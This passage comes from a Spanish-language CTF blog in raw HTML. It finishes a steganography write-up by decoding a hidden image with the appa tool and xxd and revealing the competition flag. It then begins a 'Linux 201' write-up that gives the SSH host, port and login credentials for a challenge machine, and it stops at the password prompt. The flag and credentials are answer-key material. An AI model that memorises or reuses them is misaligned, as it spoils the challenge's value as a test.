<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Descargamos el repositorio a traves de </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">git </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">clone</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> https://github.com/stncal/appa.git</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> e instalamos sus dependecias </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">pip3 install Pillow</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> . Pasamos a decodificar la imagen portadora de la cual obtenemos un mensaje hexadecimal al cual le haremos reversing:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># python3 appa/appa.py -d secret_new.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">==> Decoding image: True</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">==> Pixel data</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">First 3 pixels/possible text: [(254, 255, 255), (254, 254, 255), (255, 254, 254)]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">...</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Appa found an extremely large string </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">in</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> the image. To save your console, results are saved to file: secret_new.results</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">String length: 187142</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography/appa</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># cat secret_new.results | xxd -r -p > out</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Y aquí obtenemos nuestra bandera en la imagen out (a2e6b150c179bb8063bcd635cb8684fc)</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography/appa</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># file out</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">out: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.8.22], progressive, precision 8, 720x465, components 3</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography/appa</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># md5sum out</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">a2e6b150c179bb8063bcd635cb8684fc out</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography/appa</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># xdg-open out</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><img height="280" src="https://lh3.googleusercontent.com/edOt3BGHpkkLmI2tb0fyrmcCIUSkcdJGHxd7lwRjMcKbK9T4VR0-RXrNXVd0GH0ajHKsgCsv2ZJsM5FdsW587UzFNsqyM1m69YM9JNRQZonQivc6xoYXFZn09DFO4cEsJ-zOYiJ9" style="border: none;" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">La flag es: </span><span style="background-color: #cccccc; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">CSACTF{y1p-y1p!}</span></div>
<br /><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Autor: 1v4n a.k.a. @1r0Dm448O</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Twitter: </span><a href="https://twitter.com/1r0Dm448O" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://twitter.com/1r0Dm48O</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
</div>
Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019491 Moranchel, Guadalajara, Spain40.8171147 -2.667021400000066940.8111062 -2.6771064000000671 40.8231232 -2.6569364000000668tag:blogger.com,1999:blog-4789894782637921835.post-84876753192147445892019-05-14T16:59:00.000+02:002019-05-14T16:59:09.564+02:00WRITEUP: Challenge Linux 201 by @1r0Dm448O<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="font-size: 10pt; font-style: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; text-align: start; text-decoration-line: none; vertical-align: baseline;">Autor: 1v4n a.k.a. @1r0Dm448O</span><span style="font-size: 10pt; font-style: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; text-align: start; text-decoration-line: none; vertical-align: baseline;"><br /></span><span style="font-size: 10pt; font-style: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; text-align: start; text-decoration-line: none; vertical-align: baseline;">Twitter: </span><a href="https://twitter.com/1r0Dm448O" style="font-family: "Times New Roman"; font-size: medium; font-style: normal; font-weight: 400; text-align: start; text-decoration-line: none; white-space: normal;"><span style="color: #1155cc; font-family: Calibri, sans-serif; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://twitter.com/1r0Dm48O</span></a><span style="font-size: 10pt; font-style: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; text-align: start; text-decoration-line: none; vertical-align: baseline;"> </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Descripción</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Nombre:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span><span style="background-color: white; color: #24292e; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Linux 1</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (</span><a href="https://ctf.utsacyber.com/challenges#Linux%201" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://ctf.utsacyber.com/challenges#Linux%201</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> )</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Fecha de liberación:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> 25 de abril de 2019</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Autor: </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">53cur17y4f73rh0ur5 (</span><a href="https://ctftime.org/team/46502" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://ctftime.org/team/46502</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Dificultad:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> Bajo</span></div>
<b id="docs-internal-guid-8c752b28-7fff-4a7b-d168-e5d9855a252f" style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Objetivo</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Formato de flag: CSACTF{flag}</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><img height="198" src="https://lh3.googleusercontent.com/NVEHg90AtQ_0dTStqKGr52LeELPIG92-Mh25WqEzc_L5u3TmLZInuQr4vHcA55Mvpt8Tf-zEOxWxXnQuBfYGt816ifbD-M499BUrZGMzSsTyscmjJcmoYctoZ5WykcIQo8ktN91u" style="border: none;" width="311" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"></span></div>
<a name='more'></a><br />
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Herramientas utilizadas</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Firefox Version 60.5.1 </span><a href="https://www.mozilla.org/en-US/firefox/60.5.1/releasenotes/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://www.mozilla.org/en-US/firefox/60.5.1/releasenotes/</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">OpenSSH_7.9p1 </span><a href="https://www.openssh.com/txt/release-7.9" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://www.openssh.com/txt/release-7.9</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">lsof 4.91 ftp://</span><a href="http://lsof.itap.purdue.edu/pub/tools/unix/lsof/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">lsof.itap.purdue.edu/pub/tools/unix/lsof/</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Resumen:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Nos conectamos a la maquina en la IP </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">35.231.176.102</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> por </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">ssh</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> en el puerto </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">1773</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> con las credenciales </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user:utsacyber</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># ssh user@35.231.176.102 -p1773</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">user@35.231.176.102</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">'s password: </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 